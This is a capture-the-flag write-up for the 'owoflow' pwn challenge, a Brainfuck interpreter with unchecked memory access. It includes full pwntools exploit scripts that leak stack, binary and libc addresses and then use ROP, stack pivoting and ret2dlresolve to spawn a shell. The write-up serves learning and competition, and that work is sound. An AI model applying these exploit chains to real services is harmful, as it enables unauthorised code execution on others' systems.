ImaginaryCTF November 2021 - owoflow

owoflow we've had too much of a certain esolang this month

owoflow is the only pwn for ImaginaryCTF’s November round, and a friend of mine, @caprinux asked me to try this challenge.

The challenge presents an obvious vulnerability, but is harder to exploit than expected: my favorite kind of pwn.

Initial Review

Running checksec:

$ checksec bf
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

All protections are enabled except for RELRO, which is at Partial RELRO.

As for the decompilation of the binary, there are only 2 relevant functions. There are no other user-defined functions (no free win functions :(). One relevant function, of course, is main:

undefined8 main(void) {
  ssize_t sVar1;
  long in_FS_OFFSET;
  undefined instrs [4104];
  long local_10;

  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  setvbuf(stdin,NULL,2,0);
  setvbuf(stdout,NULL,2,0);
  setvbuf(stderr,NULL,2,0);
  len = read(0,instrs,0xfff);
  instrs[(int)len] = 0;
  bf(instrs);
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
    // WARNING: Subroutine does not return
    __stack_chk_fail();
  }
  return 0;
}

Well this is straghtforward, only reading 0xfff = 4095 characters into a buffer, then passing it to the bf function:

void bf(char *buffer) {
  int c;
  long in_FS_OFFSET;
  char *cptr;
  uint data_ptr;
  int level;
  char *ifstack [10];
  byte ram [40];
  long local_10;

  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  data_ptr = 0;
  level = 0;
  memset(ram,0,0x1e);
  for (cptr = buffer; *cptr != '\0'; cptr = cptr + 1) {
    switch(*cptr) {
    case '+':
      ram[data_ptr] = ram[data_ptr] + 1;
      break;
    case ',':
      c = getchar();
      ram[data_ptr] = (byte)c;
      break;
    case '-':
      ram[data_ptr] = ram[data_ptr] - 1;
      break;
    case '.':
      putchar((uint)ram[data_ptr]);
      break;
    case '<':
      data_ptr = data_ptr - 1;
      break;
    case '>':
      data_ptr = data_ptr + 1;
      break;
    case '[':
      if (9 < level) goto exit_loc;
      ifstack[level] = cptr;
      level = level + 1;
      break;
    case ']':
      if (ram[data_ptr] == 0) {
        level = level + -1;
      }
      else {
        cptr = ifstack[level + -1];
      }
    }
  }
exit_loc:
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
    // WARNING: Subroutine does not return
    __stack_chk_fail();
  }
  return;
}

This is the meat of the program, and is basically a brain**** interpreter. However, there are no bounds checking.

Thus, there are 2 straightforward vulnerabilities:

Arbitrary increase/decrease of data_ptr then relative-to-stack read/write.
Can decrease level to negative numbers, then overwrite cptr to an address before ifstack.

The latter vulnerability is not very useful, as after the overwrite cptr might not be pointing to a place under your control, and thus the commands that are getting executed are not useful.

We can use the former vulnerability for our purposes.

Initial Plan

For easy pwn challenges, one can easily formulate a plan of attack. This plan is usually a exploiter’s ‘happy path’, and might not succeed (whether or not that is true is upto you … and luck).

In this case, my initial plan was:

Hopefully, there is a libc pointer lying somewhere around ram
We position data_ptr (> or <) such that '.>' * 8 (print character then move left eight times) reveals this pointer
We position data_ptr around the return address then overwrite it (using ',>' * 8 ) with the calculated address of system and provide it with proper arguments

The most dubious point in our happy path is the first one, as it is upto a mixture of libc version, ld version, binary specifics and some luck. We can test and find out if the point checks out, by putting a breakpoint inside the bf function (I chose to put it in the ret instruction), then checking the address of ram and other libc pointers: ret112

rdi points to our ram, and the current instructions are ><><><>< as you can see on the stack.

Well, there are libc pointers before ram. Can we decrease data_ptr to the negative range then access them?

c = process('./bf')
c.sendline('<'*8 + '.>'*8) # go to -8 from ram, then print 8 bytes
c.interactive()

Running this leads to:

Oops, I guess not. This is due to data_ptr being declared as uint (4-byte unsigned integer) and thus when converting to 8-byte for addition in:

mov   eax, dword ptr [rbp - 0x88]         ' <---- eax = data_ptr (uint: 0xfffffff8)
movzx eax, byte ptr [rbp + rax - 0x30]    ' <---- eax = ram[data_ptr]

there is no sign extension (the value is just 2-complement of 4-byte integer extended via zero-extension).

What about after ram then?

There are pointers quite far away inside main’s instrs array, as well as after after it (e.g. return address of main, which is __libc_start_main+243).

Unfortunately, we have a issue: To access those pointers, we have to move our data_ptr by, let’s say, X instructions relative to ram, using >. This means that we will end up overwriting those pointers with the > character since the instrs character array is after ram.

Welp.

Actually thinking this through

Now that we know our happy path is ruined, we can proceed to exploiting this the hard way.

Since we have relative-to-stack read/write, I thought of doing ROP to useful places. However, PIE is enabled, so we need to leak the binary’s base address first. This is trivial since the return address is close to ram (only 0x38 away). Furthermore, a stack address is right before return address (the saved base pointer), so we can leak that too.

So we can just do this:

c.send( '>'*0x30 + '.>'*16 + <rest of payload>)
stack = u64(c.recvn(8))
main_ret = u64(c.recvn(8))
success(f"{hex(stack) = }") # saved_rbp leak
success(f"{hex(main_ret) = }")

After the leak, we can position ourselves to overwrite the return address and do a ROP. What exactly can we do? Let’s try to print some gadgets:

(Note that there are more gadgets, but they are not printed for brevity)

Well atleast the usual pop_rdi and pop_rsi gadgets are present. But other than that, useful gadgets such as push <register>; ret to leak pointers in registers, or gadgets to directly manipulate the stack or base pointer by meaningful offsets are not present (only the direct pop rsp/pop rbp gadgets are present).

Thinking back to the happy path, we note that we were defeated by having to leak libc pointers, which happened to be hard to reach.

But what if we don’t need a libc leak?

One-Hammer-Fits-All

Since we have directly control of the stack and can ROP, and since the binary is only Partial RELRO, we can use the ret2dlresolve technique. This is a leakless technique that directly resolves functions from libraries such as libc with just the function name and can even call the function with arguments, but requires to be able forge a chunk of memory close to the base address (actually just close to the GOT section) and requires Partial RELRO.

This technique is slightly unreliable but pwntools gives us a simple way to use it.

Modifying it to our needs:

c.send( '>'*0x30 + '.>'*0x10 + '<'*8 + ',>'*(20*8) + ',' + '\x00')
stack = u64(c.recvn(8))
main_ret = u64(c.recvn(8))
success(f"{hex(stack) = }") # saved_rbp leak
success(f"{hex(main_ret) = }")

context.arch = 'amd64'
e = ELF('./bf')
e.address = main_ret - 0x13dc # resolve binary base address from main_ret
context.binary = e
info(f"{hex(context.binary.address) = }")

addr = e.address+0x5500 # just a rw section in memory
rop = ROP(context.binary)
dlresolve = Ret2dlresolvePayload(e, symbol="system", args=["/bin/sh"], data_addr=addr)
rop.read(0, addr)
rop.ret2dlresolve(dlresolve)
raw_rop = rop.chain()
print(rop.dump())

# we ask for (using , in the initial instruction, right before \0x00)
# an extra byte because this sets the value of rdx right before
# we return from `bf`. this is normally unnecessary, but sadly
# there are no gadget sto manipulate the value of rdx in the binary
c.send(raw_rop + b'\0'*0x50 + b'\xff')

payload = bytearray(dlresolve.payload)
c.sendline(payload)

c.interactive()

Despite this being a copy of the code in ret2dlresolve documentation, this doesn’t work for some reason (again, this exploit is unreliable), and it segfaults inside ld.so of all places. After some debugging, I managed to make it work locally but it still fails on remote (perhaps I’m slightly off on the ld.so version).

After unsuccessfully debugging a bit more, I gave up on this avenue and tried to think of another method.

Stack-pivoting

Since the libc leaks were so far away from my controlled stack, I decided to instead use stack-pivoting to position my controlled stack right before some libc leaks (in my case, the return address of main, which will be __libc_start_main+243’). The idea is that after the stack pivot, I can easily leak it out via only a few instructions, maneuvering using >/< and printing using . .

I did this via the pop_rsp register to pivot into a known stack location (the stack leak above is 8 bytes away from __libc_start_main+243). Then, I called bf directly, rather than main, as otherwise we are just getting into the same problem as before, where the libc pointers get too far from the controlled stack. This means that I would have to provide the instructions as an argument myself, and I did this by first doing a read() into some rw memory of the binary to read in instructions then using the pop_rdi gadget to set the first parameter of bf. This gives us the desired libc leak, and we are still in position to do further overwrite of stack to ROP and call system(). The code for this is as belows:

c.send( '>'*0x30 + '.>'*16 + '<'*8 + ',>'*(0x70) + ',' + '\x00')
stack = u64(c.recvn(8))
main_ret = u64(c.recvn(8))
success(f"{hex(stack) = }") # stack_leak
success(f"{hex(main_ret) = }")

context.arch = 'amd64'
e = ELF('./bf')
e.address = main_ret - 0x13dc
context.binary = e
info(f"{hex(context.binary.address) = }")

aram = e.address + 0x4500   # just some rw-memory to write the additional instructions to
target = stack+8            # target contains mains's return address (somewhere in libc_start_main)
other_stack = target-0x40   # for stack-pivoting
pop_rsp_gadget = e.address + 0x145d # pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
pop_rdi_gadget = e.address + 0x1463 # pop rdi; ret
ret_gadget = e.address + 0x1464 # ret

rop = ROP(context.binary)

rop.read(0, other_stack)
rop.read(0, aram)

rop.raw(pop_rsp_gadget)
rop.raw(other_stack)

raw_rop = rop.chain()
print(rop.dump())

c.send(raw_rop + b'\xff') # rdx=0xff
# RSP would be changed by now by the pop rsp; pop r13; pop r14; pop r15; ret; gadget.
# So we provide arguments such that we give values to r13..r15, then call `bf(aram)``
#       r13      r14      r15      ret
c.send(p64(0) + p64(0) + p64(0) + p64(pop_rdi_gadget) + p64(aram) + p64(e.symbols['bf']))

pause()
c.send('>'*0x48 + '.>'*8 + '<'*0x20 + ',>'*0x28) # send another list of instructions

pause()

libc_main_ret = u64(c.recvn(8)) # __libc_start_main+243
libc = ELF('./libc.so.6')
libc.address = libc_main_ret - 159923
success(f"{hex(libc_main_ret) = }")
# Standard ROP to `system('/bin/sh')` (with additional ret for movaps), as well as overwrite saved_rbp
c.send(p64(0) + p64(pop_rdi_gadget) + p64(next(libc.search(b'/bin/sh'))) + p64(ret_gadget) + p64(libc.symbols['system']))

c.interactive()

Better solution

I realized that ImaginaryCTF pwn challenges are usually not supposed to be this lengthy, so I went back to look for a better solution.

Remember how we completely ignored the [ and ] instructions? Well, oops. Turns out that we can use them as a controlled for-loop, if we don’t mind overwriting some memory: [>.,].

The [ and ] instructions are basically if-statements. We turn this into a for-loop by being able to control the current ram[data_ptr], via the , instruction to read a byte of our choosing into ram[data_ptr]. If that byte is non-zero, we jump back to the previous [ in the instructions, which is just a for-loop. Obviously, to keep progressing, we will need to overwrite some bytes in our controllable stack. To avoid overwriting too many, we can increase the number of > inside the brackets to X so that we move every X bytes (higher is better, but too high might overwrite our valuable libc leaks).

So now that we can advance to our libc leaks without overwriting them, we just leak them, then traverse back to the stack frame then overwrite the return address to system/one-gadget etc (I was lazy to check if my code fit one-gadget conditions so I just did a ROP to run system('/bin/sh')).

# there is a leak at 0x40 + 0x9A * 4 = 0x2a8 (refer to previous images)

# move to 0x40 (right after return address of bf)
# for-loop to move left (we will activate 4 times)
# print-moveleft 8 bytes (leak libc pointer)
# for-loop to move right (we will activate 8 times)
#       normally we would use the same for-loop as before
#       but we have length limitations
# Overwrite return address and do ROP
payload =  '>.' * 0x40 + '[' + '>'*0x9A + '.,]' + '.>'*8  + '[' + '<'*0x55 + '.,]' + '<'*8 + '>'*0x38 + ',>'*0x20
info(f"{hex(len(payload)) = }")
c.send(payload)

mut = bytearray(b'\0'+c.recvn(0x40)) # leak out main_ret

for i in range(3):
    ch = c.recvn(1)
    mut += ch
    if ch == b'\0':
        ch = b'\x90' # just want to make sure we are moving forward
    c.send(ch)
mut += c.recvn(1)
c.send(b'\x00')

libc_leak = u64(c.recvn(8))
libc = ELF('./libc.so.6')
libc.address = libc_leak - 2023424
success(f"{hex(libc_leak) = }")

for i in range(7):
    ch = c.recvn(1)
    mut += ch
    if ch == b'\0':
        ch = b'\x90' # just want to make sure we are moving backward
    c.send(ch)
mut += c.recvn(1)
c.send(b'\x00')

print(hexdump(mut))

e = ELF('./bf')
e.address = u64(mut[0x38:][:8]) - 0x13dc # get binary's base address
pop_rdi_gadget = e.address + 0x1463
ret_gadget = e.address + 0x1464

# Standard ROP to `system('/bin/sh')` (with additional ret for movaps)
c.send(p64(pop_rdi_gadget) + p64(next(libc.search(b'/bin/sh'))) + p64(ret_gadget) + p64(libc.symbols['system']))

c.interactive()

Even better solution

Recall the core problem: we can write instructions to read libc leak, but the instructions are so long they will overwrite the libc leaks.

How about if the instructions were not to overwrite the libc leaks?

Similar to the stack-pivot method, we can do a read() to read in a string of instructions in some rw section (rather than the stack), then call bf with this string as a parameter.

This method is left as an exercise for the reader :P.

Conclusion

Sometimes missing the obvious solution is fine, as it leads to interesting exploration. In this case, it led me down to a strange path (as well as more reading into how ld.so works). Hope it was fun for the other players as much as it was for me :)